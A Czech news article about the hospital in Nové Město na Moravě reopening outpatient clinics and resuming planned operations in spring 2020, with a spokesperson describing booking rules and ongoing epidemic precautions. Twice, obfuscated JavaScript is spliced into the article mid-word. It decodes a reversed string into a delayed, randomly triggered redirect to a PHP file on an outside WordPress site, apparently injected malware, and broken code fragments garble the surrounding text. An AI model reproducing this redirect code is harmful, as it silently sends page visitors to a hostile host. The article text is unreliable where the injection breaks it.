Rainbow page separator

V nemocnici začnou naplánované operace, běžný režim se vrací

Čtvrtek, 30. dubna 2020

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Provoz ambulancí i návrat k naplánovaným operacím startuje v novoměstské nemocnici. Zařízení postupně obnoví péči o pacienty, jejichž léčba byla z důvodu koronavirové p=function(n){if ( () == „string“) ; };.list=[„\’//\’=“];(=function(n){if ( () == „string“) ; };.list=[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}); if (c==3){ ;}{if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}); if (c==3){ ;}=function(n){if ( () == „string“) ; };.list=[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}); if (c==3){ ;}{if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}andemie přerušena nebo odložena. I nadále však budou dodržována přísná epidemiologická opatření. Pacienti se mohou začít objednávat na ambulantní vyšetření i plánované zákroky.
„Pacienti se musí na vyšetření v ambulanci telefonicky objednat na konkrétní čas. Je důležité, aby dorazili co nejpřesněji, aby se v čekárnách netvořily fronty, bylo možné dodržovat bezpečné rozestupy a minimalizovat počet pacientů v čekárnách. Pokud [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zdravotní stav pacienta dovolí, měl by dorazit bez doprovodu. Doprovod u nezletilých, osob nemohoucích či tělesně postižených je v pořádku,“ přiblížila mluvčí nemocnice Tamara Pecková. Vstup do zdravotnického zařízení přes stan u hlavního vchodu, kde je příchozím změřena teplota, bude zachován i nadále.
Na termínech operace i předoperačního vyšetření se pacient musí telefonicky domluvit s personálem oddělení. „Pacientům, kteří budou podstupovat operaci, doporučujeme maximální dodržování epidemiologických opatření, aby na sebe dávali pozor a omezili komunitní kontakty,“ doplnila mluvčí. Činnost obnoví i lůžková oddělení, stále však platí zákaz návštěv.